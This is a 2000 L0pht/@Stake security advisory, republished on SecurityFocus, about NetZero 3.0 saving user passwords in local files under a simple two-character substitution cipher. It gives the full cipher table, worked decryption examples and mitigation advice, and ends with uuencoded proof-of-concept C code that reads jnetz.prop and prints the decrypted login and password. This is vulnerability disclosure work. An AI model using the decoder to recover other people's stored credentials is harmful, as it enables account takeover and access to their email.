Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

NetZero Password Encryption Algorithm
L0pht-20000718
Published: 2000-07-18 00:00:00
Updated: 2000-07-18 00:00:00

                           @Stake Inc.
                        L0pht Research Labs
   
                  www.atstake.com     www.L0pht.com


                        Security Advisory
           

                  Advisory Name: NetZero Password Encryption Algorithm
                   Release Date: 07.18.2000
                    Application: NetZero V3.0 and earlier
                       Platform: Microsoft Windows 95, 98, NT, 2000
                       Severity: Low.  Passwords can be easily decrypted by 
                                 exploiting NetZero's encryption algorithm
                         Author: Brian Carrier [bcarrier@atstake.com]        
                  Vendor Status: Vendor Contacted 6.19.00 
                            Web: http://www.L0pht.com/advisories.html

Forward:
    It is unfortunately common practice that applications which allow
users to remember their passwords as a convenience rarely encrypt them
but instead opt to simply obfuscate them. This does not alter the fact 
that user perception and expectation, for the majority of users at least, 
is often incorrectly set. Often times convenience eschews security in 
these products.

    There are dozens of applications available that make this same mistake.
This advisory is not an attempt to single one vendor out but rather 
continue to remind of the common problem of storing secrets and the 
reliance of simple obfuscation. If effort is taken to obfuscate or hide
something then it must have been seen as valuable to someone. If not,
why bother? Much the way buffer overflows abound so do simple obfuscation 
mechanisms. As such, it is important to continue to bring them to light.

    Unfortunately it is often the case that the average user places 
as much trust in these as stronger systems through the apparent similarity
in user interface.  As suggested by Aleph1, the MS CryptoAPI 
CryptoProectetData() and CryptUnprotectData() functions currently allow 
applications to store secrets encrypted, based on the user's credentials. 
Therefore, since the methods currently exist for secure data storage, they 
should be utilized by all applications to provide users with a consistent
level of protection.

    This advisory is designed to help people see ways of looking at, and
for, these sorts of problems. Or even in being aware of the situation, 
to view it as a non-problem. Teaching someone to fish rather than simply
providing one meal. Enjoy the classical substitution cipher :)

Overview: 
    NetZero is a service that provides free Internet access to customers 
in exchange for the permission to advertise. NetZero's users log into the 
network with a login and password that are saved in an ASCII text file on 
the users system.  This advisory addresses a weak encryption algorithm 
that is used to protect the password from unauthorized access.  

    In order for a NetZero account to be compromised, an attacker must 
have access to the machine or use another vulnerability to read the file.  
Once access is obtained, the attacker can easily determine the user's 
NetZero login and password in less than a seconds time.  Once the login 
and password have been determined, the attacker can read the users email  
and attack other systems under the users identity.  

    This is a common problem in many services of this type. One quick
solution to at least minimize the problem, should this risk be deemed 
unacceptable, is to disable the _Save Password_ option.

Detailed Description:
    The login and password that are required to log into the NetZero 
network are stored in an ASCII file, id.dat, in the NetZero directory.  
If the user chooses to have the application save the password, then 
jnetz.prop also contains the login and password. The password in both 
files is encrypted using a variation of a simple substitution cipher.   

    The classical substitution cipher is a 1-to-1 mapping between 
characters where each plaintext character is replaced by one ciphertext 
character.  For example, let P_i be the plaintext character in location 
'i' and C_j be the ciphertext character in location 'j', then C_i is the 
character that P_i maps to.

    The NetZero substitution cipher replaces each plaintext character by 
two ciphertext characters, but the two ciphertext characters are not 
stored together.  When substituting character P_i of a password of length 
'n', the first ciphertext character is C_i and the second character is 
C_n+i. 

The two ciphertext characters are derived from the following table:
  | 1  a M Q f 7 g T 9 4 L W e 6 y C
--+----------------------------------
g | `  a b c d e f g h i j k l m n o
T | p  q r s t u v w x y z { | } ~
f | @  A B C D E F G H I J K L M N O 
7 | P  Q R S T U V W X Y Z [ \ ] ^ _
Q | 0  1 2 3 4 5 6 7 8 9 : ; < = > ?
M | SP ! " # $ % & ' ( ) * + , - . / 

The characters inside the table represent the ASCII plaintext characters 
and SP represents a space.  

    When encrypting a string, P, of length 'n', find each character in the 
table and place the column header into C_i and place the row header into 
C_n+i.

For example:
    E(a) = ag 
    E(aa) = aagg 
    E(aqAQ1!) = aaaaaagTf7QM 
    E(`abcdefghijklmno) = 1aMQf7gT94LWe6yCgggggggggggggggg 

    When decrypting a string, C, of length '2n', then P_i will be the 
element in the above table where the column headed by C_i and the row  
headed by C_n+i intersect.  

For example:
    D(af) = A
    D(aaff) = AA
    D(aaMMQQfgfgfg) = AaBbCc


Temporary Solution:
    Exploitation of this vulnerability is only possible once an attacker 
has gained access to the id.dat or jnetz.prop files.  Therefore, NetZero  
users should not have the application save their password and they should 
delete the id.dat file every time they start the application.


Vendor Response:
   Vendor has acknowledged receipt of the advisory and has not provided 
a response as to any actions they intend to take.

Proof-of-Concept Code:
    The following code will demonstrate that the password is easily 
decrypted.  Simply uudecode, compile, and run in a directory that contains
jnetz.prop. 

begin 666 netzero.c
M(VEN8VQU9&4@/'-T9&EO+F@^"B-I;F-L=61E(#QS=')I;F<N:#X*"B-D969I
M;F4@54E$7U-)6D4)-C0*(V1E9FEN92!005-37T-)4$A%4E]325I%"3$R. HC
M9&5F:6YE(%!!4U-?4$Q!24Y?4TE:10DV- HC9&5F:6YE($)51E]325I%(#(U
M-@H*8V]N<W0@8VAA<B!D96-486)L95LV75LQ-ET@/2!["B @>R=@)RPG82<L
M)V(G+"=C)RPG9"<L)V4G+"=F)RPG9R<L)V@G+"=I)RPG:B<L)VLG+"=L)RPG
M;2<L)VXG+"=O)WTL"B @>R=P)RPG<2<L)W(G+"=S)RPG="<L)W4G+"=V)RPG
M=R<L)W@G+"=Y)RPG>B<L)WLG+"=\)RPG?2<L)WXG+#!]+ H@('LG0"<L)T$G
M+"=")RPG0R<L)T0G+"=%)RPG1B<L)T<G+"=()RPG22<L)THG+"=+)RPG3"<L
M)TTG+"=.)RPG3R=]+ H@('LG4"<L)U$G+"=2)RPG4R<L)U0G+"=5)RPG5B<L
M)U<G+"=8)RPG62<L)UHG+"=;)RPG7%PG+"==)RPG7B<L)U\G?2P*("![)S G
M+"<Q)RPG,B<L)S,G+"<T)RPG-2<L)S8G+"<W)RPG."<L)SDG+"<Z)RPG.R<L
M)SPG+"<])RPG/B<L)S\G?2P*("![)R G+"<A)RPG(B<L)R,G+"<D)RPG)2<L
M)R8G+"=<)R<L)R@G+"<I)RPG*B<L)RLG+"<L)RPG+2<L)RXG+"<O)WT*?3L*
M"FEN="!N>E]D96-R>7!T*&-H87(@8T-I<&AE<E!A<W-;4$%34U]#25!(15)?
M4TE:15TL( H@(&-H87(@8U!L86EN4&%S<UM005-37U!,04E.7U-)6D5=*0I[
M"@EI;G0@<&%S<TQE;BP@:2P@:61X,2P@:61X,CL*"7!A<W-,96X@/2!S=')L
M96XH8T-I<&AE<E!A<W,I+S(["@D*"6EF("AP87-S3&5N(#X@4$%34U]03$%)
M3E]325I%*0H)>PH)"7!R:6YT9B@B17)R;W(Z(%!L86EN('1E>'0@87)R87D@
M=&]O('-M86QL7&XB*3L*"0ER971U<FX@,3L*"7T*"@EF;W(@*&D@/2 P.R!I
M(#P@<&%S<TQE;CL@:2LK*0H)>PH)"7-W:71C:"AC0VEP:&5R4&%S<UMI72D*
M"0E["@D)8V%S92 G,2<Z"@D)"6ED>#(@/2 P.R!B<F5A:SL*"0EC87-E("=A
M)SH*"0D):61X,B ](#$[(&)R96%K.PH)"6-A<V4@)TTG.@H)"0EI9'@R(#T@
M,CL@8G)E86L["@D)8V%S92 G42<Z"@D)"6ED>#(@/2 S.R!B<F5A:SL*"0EC
M87-E("=F)SH*"0D):61X,B ](#0[(&)R96%K.PH)"6-A<V4@)S<G.@H)"0EI
M9'@R(#T@-3L@8G)E86L["@D)8V%S92 G9R<Z"@D)"6ED>#(@/2 V.R!B<F5A
M:SL*"0EC87-E("=4)SH*"0D):61X,B ](#<[(&)R96%K.PH)"6-A<V4@)SDG
M.@H)"0EI9'@R(#T@.#L@8G)E86L["@D)8V%S92 G-"<Z"@D)"6ED>#(@/2 Y
M.R!B<F5A:SL*"0EC87-E("=,)SH*"0D):61X,B ](#$P.R!B<F5A:SL*"0EC
M87-E("=7)SH*"0D):61X,B ](#$Q.R!B<F5A:SL*"0EC87-E("=E)SH*"0D)
M:61X,B ](#$R.R!B<F5A:SL*"0EC87-E("<V)SH*"0D):61X,B ](#$S.R!B
M<F5A:SL*"0EC87-E("=Y)SH*"0D):61X,B ](#$T.R!B<F5A:SL*"0EC87-E
M("=#)SH*"0D):61X,B ](#$U.R!B<F5A:SL*"0ED969A=6QT.@H)"0EP<FEN
M=&8H(D5R<F]R.B!5;FMN;W=N($-I<&AE<B!497AT(&EN9&5X.B E8UQN(BP@
M8T-I<&AE<E!A<W-;:5TI.PH)"0ER971U<FX@,3L*"0D)8G)E86L["@D)?0H*
M"0ES=VET8V@H8T-I<&AE<E!A<W-;:2MP87-S3&5N72D*"0E["@D)8V%S92 G
M9R<Z"@D)"6ED>#$@/2 P.R!B<F5A:SL*"0EC87-E("=4)SH*"0D):61X,2 ]
M(#$[(&)R96%K.PH)"6-A<V4@)V8G.@H)"0EI9'@Q(#T@,CL@8G)E86L["@D)
M8V%S92 G-R<Z"@D)"6ED>#$@/2 S.R!B<F5A:SL*"0EC87-E("=1)SH*"0D)
M:61X,2 ](#0[(&)R96%K.PH)"6-A<V4@)TTG.@H)"0EI9'@Q(#T@-3L@8G)E
M86L["@D)9&5F875L=#H*"0D)<')I;G1F*")%<G)O<CH@56YK;F]W;B!#:7!H
M97(@5&5X="!3970Z("5C7&XB+" *"0D)("!C0VEP:&5R4&%S<UMI*W!A<W-,
M96Y=*3L*"0D)<F5T=7)N(#$["@D)"6)R96%K.PH)"7T*"@D)8U!L86EN4&%S
M<UMI72 ](&1E8U1A8FQE6VED>#%=6VED>#)=.PH)?0H)8U!L86EN4&%S<UMI
M72 ](# ["@H)<F5T=7)N(# ["GT*"FEN="!M86EN*'9O:60I"GL*"49)3$4@
M*FA087)A;7,["@EC:&%R(&-"=69F97);0E5&7U-)6D5=+"!C54E$6U5)1%]3
M25I%73L*"6-H87(@8T-I<&AE<E!A<W-;4$%34U]#25!(15)?4TE:15TL(&-0
M;&%I;E!A<W-;4$%34U]03$%)3E]325I%73L*"6EN="!D;VYE(#T@,CL*"@EP
M<FEN=&8H(EQN3F5T(%IE<F\@4&%S<W=O<F0@1&5C<GEP=&]R7&XB*3L*"7!R
M:6YT9B@B0G)I86X@0V%R<FEE<B!;8F-A<G)I97) 871S=&%K92YC;VU=7&XB
M*3L*"7!R:6YT9B@B0%-T86ME($PP<&AT(%)E<V5A<F-H($QA8G-<;B(I.PH)
M<')I;G1F*")H='1P.B\O=W=W+F%T<W1A:V4N8V]M7&Y<;B(I.PH*"6EF("@H
M:%!A<F%M<R ](&9O<&5N*")J;F5T>BYP<F]P(BPB<B(I*2 ]/2!.54Q,*0H)
M>PH)"7!R:6YT9B@B56YA8FQE('1O(&9I;F0@:FYE='HN<')O<"!F:6QE7&XB
M*3L*"0ER971U<FX@,3L*"7T)"@H)=VAI;&4@*"AF9V5T<RAC0G5F9F5R+"!"
M549?4TE:12P@:%!A<F%M<RD@(3T@3E5,3"D@)B8@*&1O;F4@/B P*2D*"7L*
M"0EI9B H<W1R;F-M<"AC0G5F9F5R+" B4')O9E5)1#TB+" X*2 ]/2 P*0H)
M"7L*"0D)9&]N92TM.PH)"0ES=')N8W!Y*&-5240L(&-"=69F97(@*R X+"!5
M241?4TE:12D["@D)"7!R:6YT9B@B57-E<DE$.B E<R(L(&-5240I.PH)"7T*
M"@D):68@*'-T<FYC;7 H8T)U9F9E<BP@(E!R;V905T0](BP@."D@/3T@,"D*
M"0E["@D)"61O;F4M+3L*"0D)<W1R;F-P>2AC0VEP:&5R4&%S<RP@8T)U9F9E
M<B K(#@L(%!!4U-?0TE02$527U-)6D4I.PH)"0EP<FEN=&8H(D5N8W)Y<'1E
M9"!087-S=V]R9#H@)7,B+"!C0VEP:&5R4&%S<RD["@H)"0EI9B H;GI?9&5C
M<GEP="AC0VEP:&5R4&%S<RP@8U!L86EN4&%S<RD@(3T@,"D*"0D)"7)E='5R
M;B Q.PH)"0EE;'-E"@D)"0EP<FEN=&8H(E!L86EN(%1E>'0@4&%S<W=O<F0Z
M("5S7&XB+"!C4&QA:6Y087-S*3L*"0E]"@H)?0H*"69C;&]S92AH4&%R86US
M*3L*"@EI9B H9&]N92 ^(# I"@E["@D)<')I;G1F*"));G9A;&ED(&IN971Z
M+G!R;W @9FEL95QN(BD["@D)<F5T=7)N(#$["@E](&5L<V4@>PH)"7)E='5R
*;B P.PH)?0I]"EQN

end

bcarrier@atstake.com







 

Privacy Statement
Copyright 2008, SecurityFocus